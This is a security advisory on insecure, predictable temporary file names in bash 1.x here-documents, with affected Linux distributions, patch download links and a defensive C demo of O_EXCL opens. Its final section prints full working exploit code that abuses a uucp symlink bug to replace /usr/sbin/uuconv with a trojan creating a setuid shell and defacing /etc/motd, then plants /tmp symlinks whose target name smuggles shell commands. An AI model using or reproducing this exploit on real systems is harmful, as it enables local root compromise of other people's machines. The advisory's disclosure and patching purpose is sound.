Bash creates temporary files for its scripts in an insecure manner. This can be exploited via a symlink attack to create or write over arbitrary files on the system if the shell is run by root.
Credit:
The information has been provided by Caldera Support Info, RedHat Bugzilla, Greg KH and zenith parsec.
Vulnerable systems:
Immunix OS 6.2
OpenLinux Desktop 2.3
OpenLinux eServer 2.3 and OpenLinux eBuilder for ECential 3.0
OpenLinux eDesktop 2.4
Red Hat Linux 5.0 - i386, Alpha, Sparc
Red Hat Linux 5.1 - i386, Alpha, Sparc
Red Hat Linux 5.2 - i386, Alpha, Sparc
Red Hat Linux 6.0 - i386, Alpha, Sparc
Red Hat Linux 6.1 - i386, Alpha, Sparc
Red Hat Linux 6.2 - i386, Alpha, Sparc
Red Hat Linux 6.2EE - i386, Alpha, Sparc
The << (here-document) operator in bash 1.x used predictable temporary file names. This can also lead to a denial of service attack; a local user account is required to exploit the security hole.
Patch availability and exploit code are listed below.
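As an added illustration (not part of the advisory and not the exploit author's code), the following C program reproduces the insecure open described above next to an exclusive-create open of the same name, in a private scratch directory under /tmp; the function names and the pid value 4242 are assumptions made for the demo.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* The advisory's pattern: a name guessable from the pid, opened O_CREAT but
 * not O_EXCL, so a symlink already sitting at that name is followed and the
 * write lands wherever the link points. */
int open_predictable(const char *dir, int pid)
{
    char path[512];
    snprintf(path, sizeof path, "%s/t%d-sh", dir, pid);
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened open of the same name: O_EXCL|O_NOFOLLOW fails with EEXIST when
 * anything, a planted symlink included, already occupies it. That stops the
 * overwrite; an unguessable name (mkstemp) is also needed to stop the DoS. */
int open_exclusive(const char *dir, int pid)
{
    char path[512];
    snprintf(path, sizeof path, "%s/t%d-sh", dir, pid);
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Replays the scenario in a private scratch directory; pid 4242 is a made-up
 * value. Returns a bitmask: 1 = predictable open wrote through the link into
 * the victim file, 2 = exclusive open refused with EEXIST (3 = both). */
int run_demo(void)
{
    char dir[] = "/tmp/heredoc-demo-XXXXXX", victim[600], link[600], buf[8];
    int result = 0, fd;
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/t%d-sh", dir, 4242);
    close(open(victim, O_WRONLY | O_CREAT, 0600));  /* the file the link points at */
    if (symlink(victim, link) != 0) return -1;      /* the pre-planted link */
    if ((fd = open_predictable(dir, 4242)) >= 0) { write(fd, "owned", 5); close(fd); }
    if ((fd = open(victim, O_RDONLY)) >= 0) {
        if (read(fd, buf, 5) == 5 && memcmp(buf, "owned", 5) == 0) result |= 1;
        close(fd);
    }
    if (open_exclusive(dir, 4242) == -1 && errno == EEXIST) result |= 2;
    unlink(link); unlink(victim); rmdir(dir);
    return result;
}
```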
Patch:
Immunix 6.2:
Precompiled binary packages for Immunix 6.2 are available at:
http://www.immunix.org/ImmunixOS/6.2/updates/RPMS/bash-1.14.7-23.6x_StackGuard.i386.rpm
Source packages for Immunix 6.2 are available at:
http://www.immunix.org/ImmunixOS/6.2/updates/SRPMS/bash-1.14.7-23.6x_StackGuard.src.rpm
OpenLinux Desktop 2.3:
The upgrade packages can be found on Caldera's FTP site at:
ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/
The corresponding source code package can be found at:
ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/SRPMS
RPMS/bash-1.14.7-14.i386.rpm
SRPMS/bash-1.14.7-14.src.rpm
OpenLinux eServer 2.3 and OpenLinux eBuilder for ECential 3.0:
The upgrade packages can be found on Caldera's FTP site at:
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/
The corresponding source code package can be found at:
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/SRPMS
RPMS/bash-1.14.7-14.i386.rpm
SRPMS/bash-1.14.7-14.src.rpm
OpenLinux eDesktop 2.4:
The upgrade packages can be found on Caldera's FTP site at:
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/
The corresponding source code package can be found at:
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/SRPMS
RPMS/bash-1.14.7-14.i386.rpm
SRPMS/bash-1.14.7-14.src.rpm
Red Hat Linux 5.2:
Alpha:
ftp://updates.redhat.com/5.2/alpha/bash-1.14.7-23.5x.alpha.rpm
Sparc:
ftp://updates.redhat.com/5.2/sparc/bash-1.14.7-23.5x.sparc.rpm
i386:
ftp://updates.redhat.com/5.2/i386/bash-1.14.7-23.5x.i386.rpm
Sources:
ftp://updates.redhat.com/5.2/SRPMS/bash-1.14.7-23.5x.src.rpm
Red Hat Linux 6.2:
Alpha:
ftp://updates.redhat.com/6.2/alpha/bash-1.14.7-23.6x.alpha.rpm
Sparc:
ftp://updates.redhat.com/6.2/sparc/bash-1.14.7-23.6x.sparc.rpm
i386:
ftp://updates.redhat.com/6.2/i386/bash-1.14.7-23.6x.i386.rpm
Sources:
ftp://updates.redhat.com/6.2/SRPMS/bash-1.14.7-23.6x.src.rpm
Exploit:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

/* Target of the planted symlinks: a path under /usr/man/man1 whose name
   embeds shell commands ending in uuconv (the replaced binary below). */
#define FNAME "/usr/man/man1/last.1.gz;export PATH=.;cd ..;cd ..;cd ..;cd ..;cd usr;cd sbin;uuconv;.1.gz"

int main(void)
{
    int d;
    char fn[2000];
    char *homedir;
    FILE *file;

    printf("bashack - root using multiple config/input validation errors\n\n");
    printf("creating trojan in /usr/sbin/uuconv\n");
    printf(" - uucp bug -\n");
    printf("uucp follows symlinks as euid=uucp, (uid,gid,egid=you)\n\n");

    /* Working directory under $HOME */
    homedir = getenv("HOME");
    sprintf(fn, "%s/bashacker/", homedir);
    mkdir(fn, 0755);
    chdir(fn);
    sprintf(fn, "%s/bashacker/bashaker", homedir);
    unlink(fn);

    /* Write the source of the replacement uuconv */
    printf("== uuconv replacement\n");
    printf("* making uuconv.c\n");
    sprintf(fn, "%s/bashacker/uuconv.c", homedir);
    file = fopen(fn, "w");
    sprintf(fn, "%s/bashacker", homedir);
    fprintf(file, "main()\n{\n");
    fprintf(file, "printf(\"sendmail\\n\");\n");
    fprintf(file, "system(\"/bin/cp /bin/bash %s/bashacker;", fn);
    fprintf(file, "/bin/chmod 6711 %s/bashacker;", fn);
    fprintf(file, "echo hacked by %s>>/etc/motd;", getenv("LOGNAME"));
    fprintf(file, "echo -n \\\"at about \\\" >>/etc/motd; /bin/date >>/etc/motd");
    fprintf(file, "\");\n");
    fprintf(file, "}\n");
    fclose(file);

    printf("* compiling ./uuconv.c ==> ./uuconv \n");
    system("cc -o uuconv uuconv.c -O2;strip uuconv");

    /* uucp follows the symlink in the public spool and overwrites /usr/sbin/uuconv */
    unlink("/var/spool/uucppublic/uuconv");
    symlink("/usr/sbin/uuconv", "/var/spool/uucppublic/uuconv");
    printf("* copying to /usr/sbin via uucp bug\n");
    sprintf(fn,
        "/usr/bin/uucp %s/bashacker/uuconv /var/spool/uucppublic/uuconv", homedir);
    system(fn);

    printf("== cleaning up a little.\n");
    unlink("/var/spool/uucppublic/uuconv");
    unlink("uuconv");
    unlink("uuconv.c");

    /* Plant symlinks over a range of the predictable bash temp file names */
    printf("== set up /tmp for bash part of exploit.\n");
    for (d = 100; d < 150; d++) {
        /*
        on my machine its something like 118-120 or something, but it does
        depend on what was running, or what files existed and stuff.
        so please excuse the shotgun approach.
        */
        sprintf(fn, "/tmp/t%d-sh", d);
        unlink(fn);
        symlink(FNAME, fn);
    }
    printf("* my work here is done.\n\n");
    printf("now pray for some kinda of crash.\n\n\t--zen\n");
    return 0;
}